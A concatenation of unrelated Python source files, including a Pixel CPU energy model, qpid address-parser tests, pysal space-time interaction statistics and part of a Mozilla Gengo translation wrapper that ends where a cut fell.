CONF_TRACK_WIRED_CLIENTS, DEFAULT_TRACK_WIRED_CLIENTS
),
): bool,
vol.Optional(
CONF_UNAUTHENTICATED_MODE,
default=self.config_entry.options.get(
CONF_UNAUTHENTICATED_MODE, DEFAULT_UNAUTHENTICATED_MODE
),
): bool,
}
)
return self.async_show_form(step_id="init", data_schema=data_schema)
|
from energy_model import (ActiveState, EnergyModelNode, EnergyModelRoot,
PowerDomain, EnergyModel)
from collections import OrderedDict
silver_cpu_active_states = OrderedDict([
( 307200, ActiveState(capacity=149, power=90)),
( 384000, ActiveState(capacity=188, power=111)),
( 460800, ActiveState(capacity=225, power=133)),
( 537600, ActiveState(capacity=257, power=160)),
( 614400, ActiveState(capacity=281, power=182)),
( 691200, ActiveState(capacity=315, power=210)),
( 768000, ActiveState(capacity=368, power=251)),
( 844800, ActiveState(capacity=406, power=306)),
( 902400, ActiveState(capacity=428, power=332)),
( 979200, ActiveState(capacity=469, power=379)),
(1056000, ActiveState(capacity=502, power=438)),
(1132800, ActiveState(capacity=538, power=494)),
(1209600, ActiveState(capacity=581, power=550)),
(1286400, ActiveState(capacity=611, power=613)),
(1363200, ActiveState(capacity=648, power=670)),
(1440000, ActiveState(capacity=684, power=752)),
(1516800, ActiveState(capacity=729, power=848)),
(1593600, ActiveState(capacity=763, power=925)),
])
silver_cluster_active_states = OrderedDict([
( 307200, ActiveState(power=4)),
( 384000, ActiveState(power=4)),
( 460800, ActiveState(power=4)),
( 537600, ActiveState(power=4)),
( 614400, ActiveState(power=4)),
( 691200, ActiveState(power=4)),
( 768000, ActiveState(power=8)),
( 844800, ActiveState(power=9)),
( 902400, ActiveState(power=15)),
( 979200, ActiveState(power=16)),
(1056000, ActiveState(power=21)),
(1132800, ActiveState(power=22)),
(1209600, ActiveState(power=29)),
(1286400, ActiveState(power=32)),
(1363200, ActiveState(power=42)),
(1440000, ActiveState(power=49)),
# This power value is 41 (invalid!) in the released kernel. Patch it to
# avoid errors.
(1516800, ActiveState(power=52)),
(1593600, ActiveState(power=52)),
])
gold_cpu_active_states = OrderedDict([
( 307200, ActiveState(capacity=149, power=93)),
( 384000, ActiveState(capacity=188, power=111)),
( 460800, ActiveState(capacity=225, power=133)),
( 537600, ActiveState(capacity=257, power=160)),
( 614400, ActiveState(capacity=281, power=182)),
( 691200, ActiveState(capacity=315, power=210)),
( 748800, ActiveState(capacity=348, power=252)),
( 825600, ActiveState(capacity=374, power=290)),
( 902400, ActiveState(capacity=428, power=332)),
( 979200, ActiveState(capacity=469, power=379)),
(1056000, ActiveState(capacity=502, power=438)),
(1132800, ActiveState(capacity=538, power=494)),
(1209600, ActiveState(capacity=581, power=550)),
(1286400, ActiveState(capacity=611, power=613)),
(1363200, ActiveState(capacity=648, power=670)),
(1440000, ActiveState(capacity=684, power=752)),
(1516800, ActiveState(capacity=729, power=848)),
(1593600, ActiveState(capacity=763, power=925)),
(1670400, ActiveState(capacity=795, power=1018)),
(1747200, ActiveState(capacity=832, power=1073)),
(1824000, ActiveState(capacity=868, power=1209)),
(1900800, ActiveState(capacity=905, power=1298)),
(1977600, ActiveState(capacity=952, power=1428)),
(2054400, ActiveState(capacity=979, power=1521)),
(2150400, ActiveState(capacity=1024, power=1715)),
])
gold_cluster_active_states = OrderedDict([
( 307200, ActiveState(power=4)),
( 384000, ActiveState(power=4)),
( 460800, ActiveState(power=4)),
( 537600, ActiveState(power=4)),
( 614400, ActiveState(power=4)),
( 691200, ActiveState(power=4)),
( 748800, ActiveState(power=7)),
( 825600, ActiveState(power=10)),
( 902400, ActiveState(power=15)),
( 979200, ActiveState(power=16)),
(1056000, ActiveState(power=21)),
(1132800, ActiveState(power=22)),
(1209600, ActiveState(power=29)),
(1286400, ActiveState(power=32)),
(1363200, ActiveState(power=42)),
(1440000, ActiveState(power=49)),
# This power value is 41 (invalid!) in the released kernel. Patch it to
# avoid errors.
(1516800, ActiveState(power=52)),
(1593600, ActiveState(power=52)),
(1670400, ActiveState(power=62)),
(1747200, ActiveState(power=69)),
(1824000, ActiveState(power=75)),
(1900800, ActiveState(power=81)),
(1977600, ActiveState(power=90)),
(2054400, ActiveState(power=93)),
(2150400, ActiveState(power=96)),
])
cpu_idle_states = OrderedDict([
("WFI", 2),
("cpu-sleep-0", 0),
("cluster-sleep-0", 0),
])
cluster_idle_states = OrderedDict([
("WFI", 0),
("cpu-sleep-0", 0),
("cluster-sleep-0", 0),
])
silvers = [0, 1]
golds = [2, 3]
def silver_cpu_node(cpu):
return EnergyModelNode(cpu=cpu,
active_states=silver_cpu_active_states,
idle_states=cpu_idle_states)
def gold_cpu_node(cpu):
return EnergyModelNode(cpu=cpu,
active_states=gold_cpu_active_states,
idle_states=cpu_idle_states)
def cpu_pd(cpu):
return PowerDomain(cpu=cpu, idle_states=["WFI", "cpu-sleep-0"])
pixel_energy = EnergyModel(
root_node=EnergyModelRoot(children=[
EnergyModelNode(name='cluster_silver',
children=[silver_cpu_node(c) for c in silvers],
active_states=silver_cluster_active_states,
idle_states=cluster_idle_states),
EnergyModelNode(name='cluster_gold',
children=[gold_cpu_node(c) for c in golds],
active_states=gold_cluster_active_states,
idle_states=cluster_idle_states)]),
root_power_domain=PowerDomain(idle_states=[], children=[
PowerDomain(idle_states=['cluster-sleep-0'], children=[
cpu_pd(c) for c in silvers]),
PowerDomain(idle_states=['cluster-sleep-0'], children=[
cpu_pd(c) for c in golds])]),
freq_domains=[silvers, golds])
|
from qpid.tests import Test
from qpid.messaging.address import lex, parse, ParseError, EOF, ID, NUMBER, \
SYM, WSPACE, LEXER
from qpid.lexer import Token
from qpid.harness import Skipped
from qpid.tests.parser import ParserBase
def indent(st):
return " " + st.replace("\n", "\n ")
def pprint_address(name, subject, options):
return "NAME: %s\nSUBJECT: %s\nOPTIONS: %s" % \
(pprint(name), pprint(subject), pprint(options))
def pprint(o):
if isinstance(o, dict):
return pprint_map(o)
elif isinstance(o, list):
return pprint_list(o)
elif isinstance(o, basestring):
return pprint_string(o)
else:
return repr(o)
def pprint_map(m):
items = ["%s: %s" % (pprint(k), pprint(v)) for k, v in m.items()]
items.sort()
return pprint_items("{", items, "}")
def pprint_list(l):
return pprint_items("[", [pprint(x) for x in l], "]")
def pprint_items(start, items, end):
if items:
return "%s\n%s\n%s" % (start, ",\n".join([indent(i) for i in items]), end)
else:
return "%s%s" % (start, end)
def pprint_string(s):
result = "'"
for c in s:
if c == "'":
result += "\\'"
elif c == "\n":
result += "\\n"
elif ord(c) >= 0x80:
result += "\\u%04x" % ord(c)
else:
result += c
result += "'"
return result
class AddressTests(ParserBase, Test):
EXCLUDE = (WSPACE, EOF)
def fields(self, line, n):
result = line.split(":", n - 1)
result.extend([None]*(n - len(result)))
return result
def call(self, parser, mode, input):
try:
from subprocess import Popen, PIPE, STDOUT
po = Popen([parser, mode], stdin=PIPE, stdout=PIPE, stderr=STDOUT)
except ImportError, e:
raise Skipped("%s" % e)
except OSError, e:
raise Skipped("%s: %s" % (e, parser))
out, _ = po.communicate(input=input)
return out
def parser(self):
return self.config.defines.get("address.parser")
def do_lex(self, st):
parser = self.parser()
if parser:
out = self.call(parser, "lex", st)
lines = out.split("\n")
toks = []
for line in lines:
if line.strip():
name, position, value = self.fields(line, 3)
toks.append(Token(LEXER.type(name), value, position, st))
return toks
else:
return lex(st)
def do_parse(self, st):
return parse(st)
def valid(self, addr, name=None, subject=None, options=None):
parser = self.parser()
if parser:
got = self.call(parser, "parse", addr)
expected = "%s\n" % pprint_address(name, subject, options)
assert expected == got, "expected\n<EXP>%s</EXP>\ngot\n<GOT>%s</GOT>" % (expected, got)
else:
ParserBase.valid(self, addr, (name, subject, options))
def invalid(self, addr, error=None):
parser = self.parser()
if parser:
got = self.call(parser, "parse", addr)
expected = "ERROR: %s\n" % error
assert expected == got, "expected %r, got %r" % (expected, got)
else:
ParserBase.invalid(self, addr, error)
def testDashInId1(self):
self.lex("foo-bar", ID)
def testDashInId2(self):
self.lex("foo-3", ID)
def testDashAlone1(self):
self.lex("foo - bar", ID, SYM, ID)
def testDashAlone2(self):
self.lex("foo - 3", ID, SYM, NUMBER)
def testLeadingDash(self):
self.lex("-foo", SYM, ID)
def testTrailingDash(self):
self.lex("foo-", ID, SYM)
def testNegativeNum(self):
self.lex("-3", NUMBER)
def testIdNum(self):
self.lex("id1", ID)
def testIdSpaceNum(self):
self.lex("id 1", ID, NUMBER)
def testHash(self):
self.valid("foo/bar.#", "foo", "bar.#")
def testStar(self):
self.valid("foo/bar.*", "foo", "bar.*")
def testColon(self):
self.valid("foo.bar/baz.qux:moo:arf", "foo.bar", "baz.qux:moo:arf")
def testOptions(self):
self.valid("foo.bar/baz.qux:moo:arf; {key: value}",
"foo.bar", "baz.qux:moo:arf", {"key": "value"})
def testOptionsTrailingComma(self):
self.valid("name/subject; {key: value,}", "name", "subject",
{"key": "value"})
def testOptionsNone(self):
self.valid("name/subject; {key: None}", "name", "subject",
{"key": None})
def testSemiSubject(self):
self.valid("foo.bar/'baz.qux;moo:arf'; {key: value}",
"foo.bar", "baz.qux;moo:arf", {"key": "value"})
def testCommaSubject(self):
self.valid("foo.bar/baz.qux.{moo,arf}", "foo.bar", "baz.qux.{moo,arf}")
def testCommaSubjectOptions(self):
self.valid("foo.bar/baz.qux.{moo,arf}; {key: value}", "foo.bar",
"baz.qux.{moo,arf}", {"key": "value"})
def testUnbalanced(self):
self.valid("foo.bar/baz.qux.{moo,arf; {key: value}", "foo.bar",
"baz.qux.{moo,arf", {"key": "value"})
def testSlashQuote(self):
self.valid("foo.bar\\/baz.qux.{moo,arf; {key: value}",
"foo.bar/baz.qux.{moo,arf",
None, {"key": "value"})
def testSlashHexEsc1(self):
self.valid("foo.bar\\x00baz.qux.{moo,arf; {key: value}",
"foo.bar\x00baz.qux.{moo,arf",
None, {"key": "value"})
def testSlashHexEsc2(self):
self.valid("foo.bar\\xffbaz.qux.{moo,arf; {key: value}",
"foo.bar\xffbaz.qux.{moo,arf",
None, {"key": "value"})
def testSlashHexEsc3(self):
self.valid("foo.bar\\xFFbaz.qux.{moo,arf; {key: value}",
"foo.bar\xFFbaz.qux.{moo,arf",
None, {"key": "value"})
def testSlashUnicode1(self):
self.valid("foo.bar\\u1234baz.qux.{moo,arf; {key: value}",
u"foo.bar\u1234baz.qux.{moo,arf", None, {"key": "value"})
def testSlashUnicode2(self):
self.valid("foo.bar\\u0000baz.qux.{moo,arf; {key: value}",
u"foo.bar\u0000baz.qux.{moo,arf", None, {"key": "value"})
def testSlashUnicode3(self):
self.valid("foo.bar\\uffffbaz.qux.{moo,arf; {key: value}",
u"foo.bar\uffffbaz.qux.{moo,arf", None, {"key": "value"})
def testSlashUnicode4(self):
self.valid("foo.bar\\uFFFFbaz.qux.{moo,arf; {key: value}",
u"foo.bar\uFFFFbaz.qux.{moo,arf", None, {"key": "value"})
def testNoName(self):
self.invalid("; {key: value}",
"unexpected token SEMI(;) line:1,0:; {key: value}")
def testEmpty(self):
self.invalid("", "unexpected token EOF line:1,0:")
def testNoNameSlash(self):
self.invalid("/asdf; {key: value}",
"unexpected token SLASH(/) line:1,0:/asdf; {key: value}")
def testBadOptions1(self):
self.invalid("name/subject; {",
"expecting (NUMBER, STRING, ID, LBRACE, LBRACK, RBRACE), "
"got EOF line:1,15:name/subject; {")
def testBadOptions2(self):
self.invalid("name/subject; { 3",
"expecting COLON, got EOF "
"line:1,17:name/subject; { 3")
def testBadOptions3(self):
self.invalid("name/subject; { key:",
"expecting (NUMBER, STRING, ID, LBRACE, LBRACK), got EOF "
"line:1,20:name/subject; { key:")
def testBadOptions4(self):
self.invalid("name/subject; { key: value",
"expecting (COMMA, RBRACE), got EOF "
"line:1,26:name/subject; { key: value")
def testBadOptions5(self):
self.invalid("name/subject; { key: value asdf",
"expecting (COMMA, RBRACE), got ID(asdf) "
"line:1,27:name/subject; { key: value asdf")
def testBadOptions6(self):
self.invalid("name/subject; { key: value,",
"expecting (NUMBER, STRING, ID, LBRACE, LBRACK, RBRACE), got EOF "
"line:1,27:name/subject; { key: value,")
def testBadOptions7(self):
self.invalid("name/subject; { key: value } asdf",
"expecting EOF, got ID(asdf) "
"line:1,29:name/subject; { key: value } asdf")
def testList1(self):
self.valid("name/subject; { key: [] }", "name", "subject", {"key": []})
def testList2(self):
self.valid("name/subject; { key: ['one'] }", "name", "subject", {"key": ['one']})
def testList3(self):
self.valid("name/subject; { key: [1, 2, 3] }", "name", "subject",
{"key": [1, 2, 3]})
def testList4(self):
self.valid("name/subject; { key: [1, [2, 3], 4] }", "name", "subject",
{"key": [1, [2, 3], 4]})
def testBadList1(self):
self.invalid("name/subject; { key: [ }", "expecting (NUMBER, STRING, ID, LBRACE, LBRACK), "
"got RBRACE(}) line:1,23:name/subject; { key: [ }")
def testBadList2(self):
self.invalid("name/subject; { key: [ 1 }", "expecting (COMMA, RBRACK), "
"got RBRACE(}) line:1,25:name/subject; { key: [ 1 }")
def testBadList3(self):
self.invalid("name/subject; { key: [ 1 2 }", "expecting (COMMA, RBRACK), "
"got NUMBER(2) line:1,25:name/subject; { key: [ 1 2 }")
def testBadList4(self):
self.invalid("name/subject; { key: [ 1 2 ] }", "expecting (COMMA, RBRACK), "
"got NUMBER(2) line:1,25:name/subject; { key: [ 1 2 ] }")
def testMap1(self):
self.valid("name/subject; { 'key': value }",
"name", "subject", {"key": "value"})
def testMap2(self):
self.valid("name/subject; { 1: value }", "name", "subject", {1: "value"})
def testMap3(self):
self.valid('name/subject; { "foo.bar": value }',
"name", "subject", {"foo.bar": "value"})
def testBoolean(self):
self.valid("name/subject; { true1: True, true2: true, "
"false1: False, false2: false }",
"name", "subject", {"true1": True, "true2": True,
"false1": False, "false2": False})
|
import os
import unittest
from mi.core.log import get_logger
from mi.dataset.dataset_driver import ParticleDataHandler
from mi.dataset.driver.sio_eng.sio.resource import RESOURCE_PATH
from mi.dataset.driver.sio_eng.sio.sio_eng_sio_recovered_driver import parse
__author__ = 'jroy'
log = get_logger()
class DriverTest(unittest.TestCase):
def test_one(self):
source_file_path = os.path.join(RESOURCE_PATH, 'STA15908.DAT')
particle_data_handler = ParticleDataHandler()
particle_data_handler = parse(None, source_file_path, particle_data_handler)
log.debug("SAMPLES: %s", particle_data_handler._samples)
log.debug("FAILURE: %s", particle_data_handler._failure)
self.assertEquals(particle_data_handler._failure, False)
if __name__ == '__main__':
test = DriverTest('test_one')
test.test_one()
|
class StreamlinkError(Exception):
"""Any error caused by Streamlink will be caught
with this exception."""
class PluginError(StreamlinkError):
"""Plugin related error."""
class NoStreamsError(StreamlinkError):
def __init__(self, url):
self.url = url
err = "No streams found on this URL: {0}".format(url)
Exception.__init__(self, err)
class NoPluginError(PluginError):
"""No relevant plugin has been loaded."""
class StreamError(StreamlinkError):
"""Stream related error."""
__all__ = ["StreamlinkError", "PluginError", "NoPluginError",
"NoStreamsError", "StreamError"]
|
from requestbuilder import Arg
from euca2ools.commands.ec2 import EC2Request
class DeleteDhcpOptions(EC2Request):
DESCRIPTION = 'Delete a VPC DHCP option set'
ARGS = [Arg('DhcpOptionsId', metavar='DHCPOPTS',
help='ID of the DHCP option set to delete (required)')]
|
"""
Methods for identifying space-time interaction in spatio-temporal event
data.
"""
__author__ = "Nicholas Malizia <nmalizia@asu.edu>"
import pysal
import numpy as np
import scipy.stats as stats
import pysal.weights.Distance as Distance
from pysal import cg
from pysal.spatial_dynamics import util
__all__ = ['SpaceTimeEvents', 'knox', 'mantel', 'jacquez', 'modified_knox']
class SpaceTimeEvents:
"""
Method for reformatting event data stored in a shapefile for use in
calculating metrics of spatio-temporal interaction.
Parameters
----------
path : string
the path to the appropriate shapefile, including the
file name, but excluding the extension
time : string
column header in the DBF file indicating the column
containing the time stamp
Attributes
----------
n : int
number of events
x : array
n x 1 array of the x coordinates for the events
y : array
n x 1 array of the y coordinates for the events
t : array
n x 1 array of the temporal coordinates for the events
space : array
n x 2 array of the spatial coordinates (x,y) for the
events
time : array
n x 2 array of the temporal coordinates (t,1) for the
events, the second column is a vector of ones
Examples
--------
>>> import numpy as np
>>> import pysal
Read in the example shapefile data, ensuring to omit the file
extension. In order to successfully create the event data the .dbf file
associated with the shapefile should have a column of values that are a
timestamp for the events. There should be a numerical value (not a
date) in every field.
>>> path = pysal.examples.get_path("burkitt")
Create an instance of SpaceTimeEvents from a shapefile, where the
temporal information is stored in a column named "T".
>>> events = SpaceTimeEvents(path,'T')
See how many events are in the instance.
>>> events.n
188
Check the spatial coordinates of the first event.
>>> events.space[0]
array([ 300., 302.])
Check the time of the first event.
>>> events.t[0]
array([413])
"""
def __init__(self, path, time_col):
shp = pysal.open(path + '.shp')
dbf = pysal.open(path + '.dbf')
# extract the spatial coordinates from the shapefile
x = []
y = []
n = 0
for i in shp:
count = 0
for j in i:
if count == 0:
x.append(j)
elif count == 1:
y.append(j)
count += 1
n += 1
self.n = n
x = np.array(x)
y = np.array(y)
self.x = np.reshape(x, (n, 1))
self.y = np.reshape(y, (n, 1))
self.space = np.hstack((self.x, self.y))
# extract the temporal information from the database
t = np.array(dbf.by_col(time_col))
line = np.ones((n, 1))
self.t = np.reshape(t, (n, 1))
self.time = np.hstack((self.t, line))
# close open objects
dbf.close()
shp.close()
def knox(events, delta, tau, permutations=99):
"""
Knox test for spatio-temporal interaction. [1]_
Parameters
----------
events : space time events object
an output instance from the class SpaceTimeEvents
delta : float
threshold for proximity in space
tau : float
threshold for proximity in time
permutations : int
the number of permutations used to establish pseudo-
significance (default is 99)
Returns
-------
knox_result : dictionary
contains the statistic (stat) for the test and the
associated p-value (pvalue)
stat : float
value of the knox test for the dataset
pvalue : float
pseudo p-value associated with the statistic
References
----------
.. [1] E. Knox. 1964. The detection of space-time
interactions. Journal of the Royal Statistical Society. Series C
(Applied Statistics), 13(1):25-30.
Examples
--------
>>> import numpy as np
>>> import pysal
Read in the example data and create an instance of SpaceTimeEvents.
>>> path = pysal.examples.get_path("burkitt")
>>> events = SpaceTimeEvents(path,'T')
Set the random seed generator. This is used by the permutation based
inference to replicate the pseudo-significance of our example results -
the end-user will normally omit this step.
>>> np.random.seed(100)
Run the Knox test with distance and time thresholds of 20 and 5,
respectively. This counts the events that are closer than 20 units in
space, and 5 units in time.
>>> result = knox(events,delta=20,tau=5,permutations=99)
Next, we examine the results. First, we call the statistic from the
results results dictionary. This reports that there are 13 events close
in both space and time, according to our threshold definitions.
>>> print(result['stat'])
13.0
Next, we look at the pseudo-significance of this value, calculated by
permuting the timestamps and rerunning the statistics. In this case,
the results indicate there is likely no space-time interaction between
the events.
>>> print("%2.2f"%result['pvalue'])
0.18
"""
n = events.n
s = events.space
t = events.t
# calculate the spatial and temporal distance matrices for the events
sdistmat = cg.distance_matrix(s)
tdistmat = cg.distance_matrix(t)
# identify events within thresholds
spacmat = np.ones((n, n))
test = sdistmat <= delta
spacmat = spacmat * test
timemat = np.ones((n, n))
test = tdistmat <= tau
timemat = timemat * test
# calculate the statistic
knoxmat = timemat * spacmat
stat = (knoxmat.sum() - n) / 2
# return results (if no inference)
if permutations == 0:
return stat
distribution = []
# loop for generating a random distribution to assess significance
for p in range(permutations):
rtdistmat = util.shuffle_matrix(tdistmat, range(n))
timemat = np.ones((n, n))
test = rtdistmat <= tau
timemat = timemat * test
knoxmat = timemat * spacmat
k = (knoxmat.sum() - n) / 2
distribution.append(k)
# establish the pseudo significance of the observed statistic
distribution = np.array(distribution)
greater = np.ma.masked_greater_equal(distribution, stat)
count = np.ma.count_masked(greater)
pvalue = (count + 1.0) / (permutations + 1.0)
# return results
knox_result = {'stat': stat, 'pvalue': pvalue}
return knox_result
def mantel(events, permutations=99, scon=1.0, spow=-1.0, tcon=1.0, tpow=-1.0):
"""
Standardized Mantel test for spatio-temporal interaction. [2]_
Parameters
----------
events : space time events object
an output instance from the class SpaceTimeEvents
permutations : int
the number of permutations used to establish pseudo-
significance (default is 99)
scon : float
constant added to spatial distances
spow : float
value for power transformation for spatial distances
tcon : float
constant added to temporal distances
tpow : float
value for power transformation for temporal distances
Returns
-------
mantel_result : dictionary
contains the statistic (stat) for the test and the
associated p-value (pvalue)
stat : float
value of the knox test for the dataset
pvalue : float
pseudo p-value associated with the statistic
Reference
---------
.. [2] N. Mantel. 1967. The detection of disease clustering and a
generalized regression approach. Cancer Research, 27(2):209-220.
Examples
--------
>>> import numpy as np
>>> import pysal
Read in the example data and create an instance of SpaceTimeEvents.
>>> path = pysal.examples.get_path("burkitt")
>>> events = SpaceTimeEvents(path,'T')
Set the random seed generator. This is used by the permutation based
inference to replicate the pseudo-significance of our example results -
the end-user will normally omit this step.
>>> np.random.seed(100)
The standardized Mantel test is a measure of matrix correlation between
the spatial and temporal distance matrices of the event dataset. The
following example runs the standardized Mantel test without a constant
or transformation; however, as recommended by Mantel (1967) [2]_, these
should be added by the user. This can be done by adjusting the constant
and power parameters.
>>> result = mantel(events, 99, scon=1.0, spow=-1.0, tcon=1.0, tpow=-1.0)
Next, we examine the result of the test.
>>> print("%6.6f"%result['stat'])
0.048368
Finally, we look at the pseudo-significance of this value, calculated by
permuting the timestamps and rerunning the statistic for each of the 99
permutations. According to these parameters, the results indicate
space-time interaction between the events.
>>> print("%2.2f"%result['pvalue'])
0.01
"""
n = events.n
s = events.space
t = events.t
# calculate the spatial and temporal distance matrices for the events
distmat = cg.distance_matrix(s)
timemat = cg.distance_matrix(t)
# calculate the transformed standardized statistic
timevec = (util.get_lower(timemat) + tcon) ** tpow
distvec = (util.get_lower(distmat) + scon) ** spow
stat = stats.pearsonr(timevec, distvec)[0].sum()
# return the results (if no inference)
if permutations == 0:
return stat
# loop for generating a random distribution to assess significance
dist = []
for i in range(permutations):
trand = util.shuffle_matrix(timemat, range(n))
timevec = (util.get_lower(trand) + tcon) ** tpow
m = stats.pearsonr(timevec, distvec)[0].sum()
dist.append(m)
## establish the pseudo significance of the observed statistic
distribution = np.array(dist)
greater = np.ma.masked_greater_equal(distribution, stat)
count = np.ma.count_masked(greater)
pvalue = (count + 1.0) / (permutations + 1.0)
# report the results
mantel_result = {'stat': stat, 'pvalue': pvalue}
return mantel_result
def jacquez(events, k, permutations=99):
"""
Jacquez k nearest neighbors test for spatio-temporal interaction. [3]_
Parameters
----------
events : space time events object
an output instance from the class SpaceTimeEvents
k : int
the number of nearest neighbors to be searched
permutations : int
the number of permutations used to establish pseudo-
significance (default is 99)
Returns
-------
jacquez_result : dictionary
contains the statistic (stat) for the test and the
associated p-value (pvalue)
stat : float
value of the Jacquez k nearest neighbors test for the
dataset
pvalue : float
p-value associated with the statistic (normally
distributed with k-1 df)
References
----------
.. [3] G. Jacquez. 1996. A k nearest neighbour test for space-time
interaction. Statistics in Medicine, 15(18):1935-1949.
Examples
--------
>>> import numpy as np
>>> import pysal
Read in the example data and create an instance of SpaceTimeEvents.
>>> path = pysal.examples.get_path("burkitt")
>>> events = SpaceTimeEvents(path,'T')
The Jacquez test counts the number of events that are k nearest
neighbors in both time and space. The following runs the Jacquez test
on the example data and reports the resulting statistic. In this case,
there are 13 instances where events are nearest neighbors in both space
and time.
>>> np.random.seed(100)
>>> result = jacquez(events,k=3,permutations=99)
>>> print result['stat']
13
The significance of this can be assessed by calling the p-
value from the results dictionary, as shown below. Again, no
space-time interaction is observed.
>>> print("%2.2f"%result['pvalue'])
0.21
"""
n = events.n
time = events.time
space = events.space
# calculate the nearest neighbors in space and time separately
knnt = Distance.knnW(time, k)
knns = Distance.knnW(space, k)
nnt = knnt.neighbors
nns = knns.neighbors
knn_sum = 0
# determine which events are nearest neighbors in both space and time
for i in range(n):
t_neighbors = nnt[i]
s_neighbors = nns[i]
check = set(t_neighbors)
inter = check.intersection(s_neighbors)
count = len(inter)
knn_sum += count
stat = knn_sum
# return the results (if no inference)
if permutations == 0:
return stat
# loop for generating a random distribution to assess significance
dist = []
for p in range(permutations):
j = 0
trand = np.random.permutation(time)
knnt = Distance.knnW(trand, k)
nnt = knnt.neighbors
for i in range(n):
t_neighbors = nnt[i]
s_neighbors = nns[i]
check = set(t_neighbors)
inter = check.intersection(s_neighbors)
count = len(inter)
j += count
dist.append(j)
# establish the pseudo significance of the observed statistic
distribution = np.array(dist)
greater = np.ma.masked_greater_equal(distribution, stat)
count = np.ma.count_masked(greater)
pvalue = (count + 1.0) / (permutations + 1.0)
# report the results
jacquez_result = {'stat': stat, 'pvalue': pvalue}
return jacquez_result
def modified_knox(events, delta, tau, permutations=99):
"""
Baker's modified Knox test for spatio-temporal interaction. [1]_
Parameters
----------
events : space time events object
an output instance from the class SpaceTimeEvents
delta : float
threshold for proximity in space
tau : float
threshold for proximity in time
permutations : int
the number of permutations used to establish pseudo-
significance (default is 99)
Returns
-------
modknox_result : dictionary
contains the statistic (stat) for the test and the
associated p-value (pvalue)
stat : float
value of the modified knox test for the dataset
pvalue : float
pseudo p-value associated with the statistic
References
----------
.. [1] R.D. Baker. Identifying space-time disease clusters. Acta Tropica,
91(3):291-299, 2004
Examples
--------
>>> import numpy as np
>>> import pysal
Read in the example data and create an instance of SpaceTimeEvents.
>>> path = pysal.examples.get_path("burkitt")
>>> events = SpaceTimeEvents(path,'T')
Set the random seed generator. This is used by the permutation based
inference to replicate the pseudo-significance of our example results -
the end-user will normally omit this step.
>>> np.random.seed(100)
Run the modified Knox test with distance and time thresholds of 20 and 5,
respectively. This counts the events that are closer than 20 units in
space, and 5 units in time.
>>> result = modified_knox(events,delta=20,tau=5,permutations=99)
Next, we examine the results. First, we call the statistic from the
results dictionary. This reports the difference between the observed
and expected Knox statistic.
>>> print("%2.8f"%result['stat'])
2.81016043
Next, we look at the pseudo-significance of this value, calculated by
permuting the timestamps and rerunning the statistics. In this case,
the results indicate there is likely no space-time interaction.
>>> print("%2.2f"%result['pvalue'])
0.11
"""
n = events.n
s = events.space
t = events.t
# calculate the spatial and temporal distance matrices for the events
sdistmat = cg.distance_matrix(s)
tdistmat = cg.distance_matrix(t)
# identify events within thresholds
spacmat = np.ones((n, n))
spacbin = sdistmat <= delta
spacmat = spacmat * spacbin
timemat = np.ones((n, n))
timebin = tdistmat <= tau
timemat = timemat * timebin
# calculate the observed (original) statistic
knoxmat = timemat * spacmat
obsstat = (knoxmat.sum() - n)
# calculate the expectated value
ssumvec = np.reshape((spacbin.sum(axis=0) - 1), (n, 1))
tsumvec = np.reshape((timebin.sum(axis=0) - 1), (n, 1))
expstat = (ssumvec * tsumvec).sum()
# calculate the modified stat
stat = (obsstat - (expstat / (n - 1.0))) / 2.0
# return results (if no inference)
if permutations == 0:
return stat
distribution = []
# loop for generating a random distribution to assess significance
for p in range(permutations):
rtdistmat = util.shuffle_matrix(tdistmat, range(n))
timemat = np.ones((n, n))
timebin = rtdistmat <= tau
timemat = timemat * timebin
# calculate the observed knox again
knoxmat = timemat * spacmat
obsstat = (knoxmat.sum() - n)
# calculate the expectated value again
ssumvec = np.reshape((spacbin.sum(axis=0) - 1), (n, 1))
tsumvec = np.reshape((timebin.sum(axis=0) - 1), (n, 1))
expstat = (ssumvec * tsumvec).sum()
# calculate the modified stat
tempstat = (obsstat - (expstat / (n - 1.0))) / 2.0
distribution.append(tempstat)
# establish the pseudo significance of the observed statistic
distribution = np.array(distribution)
greater = np.ma.masked_greater_equal(distribution, stat)
count = np.ma.count_masked(greater)
pvalue = (count + 1.0) / (permutations + 1.0)
# return results
modknox_result = {'stat': stat, 'pvalue': pvalue}
return modknox_result
|
from functools import wraps
from django.conf import settings
import json
import requests
from gengo import Gengo, GengoError # noqa
GENGO_LANGUAGE_CACHE = None
GENGO_LANGUAGE_PAIRS_CACHE = None
GENGO_UNSUPPORTED_MACHINE_LC_SRC = [
'ar',
'cs',
'da',
'el',
'fi',
'hu',
'id',
'ms',
'no',
'ro',
'sk',
'sv',
'th',
'tr',
'uk',
'vi',
]
GENGO_COMMENT = """\
This is a response from the Mozilla Input feedback system. It was
submitted by an anonymous user in a non-English language. The feedback
is used in aggregate to determine general user sentiment about Mozilla
products and its features.
This translation job was created by an automated system, so we're
unable to respond to translator comments.
If the response is nonsensical or junk text, then write "spam".
"""
GENGO_DETECT_LANGUAGE_API = 'https://api.gengo.com/service/detect_language'
class FjordGengoError(Exception):
"""Superclass for all Gengo translation errors"""
pass
class GengoConfigurationError(FjordGengoError):
"""Raised when the Gengo-centric keys aren't set in settings"""
class GengoUnknownLanguage(FjordGengoError):
"""Raised when the guesser can't guess the language"""
class GengoUnsupportedLanguage(FjordGengoError):
"""Raised when the guesser guesses a language Gengo doesn't support
.. Note::
If you buy me a beer, I'll happily tell you how I feel about
this.
"""
class GengoAPIFailure(FjordGengoError):
"""Raised when the api kicks up an error"""
class GengoMachineTranslationFailure(FjordGengoError):
"""Raised when machine translation didn't work"""
class GengoHumanTranslationFailure(FjordGengoError):
"""Raised when human translation didn't work"""
def requires_keys(fun):
"""Throw GengoConfigurationError if keys aren't set"""
@wraps(fun)
def _requires_keys(self, *args, **kwargs):
if not self.gengo_api:
raise GengoConfigurationError()
return fun(self, *args, **kwargs)
return _requires_keys
class FjordGengo(object):
def __init__(self):
"""Constructs a FjordGengo wrapper around the Gengo class
We do this to make using the API a little easier in the
context for Fjord as it includes the business logic around
specific use cases we have.
Also, having all the Gengo API stuff in one place makes it
easier for mocking when testing.
"""
if settings.GENGO_PUBLIC_KEY and settings.GENGO_PRIVATE_KEY:
gengo_api = Gengo(
public_key=settings.GENGO_PUBLIC_KEY,
private_key=settings.GENGO_PRIVATE_KEY,
sandbox=getattr(settings, 'GENGO_USE_SANDBOX', True)
)
else:
gengo_api = None
self.gengo_api = gengo_api
def is_configured(self):
"""Returns whether Gengo is configured for Gengo API requests"""
return not (self.gengo_api is None)
@requires_keys
def get_balance(self):
"""Returns the account balance as a float"""
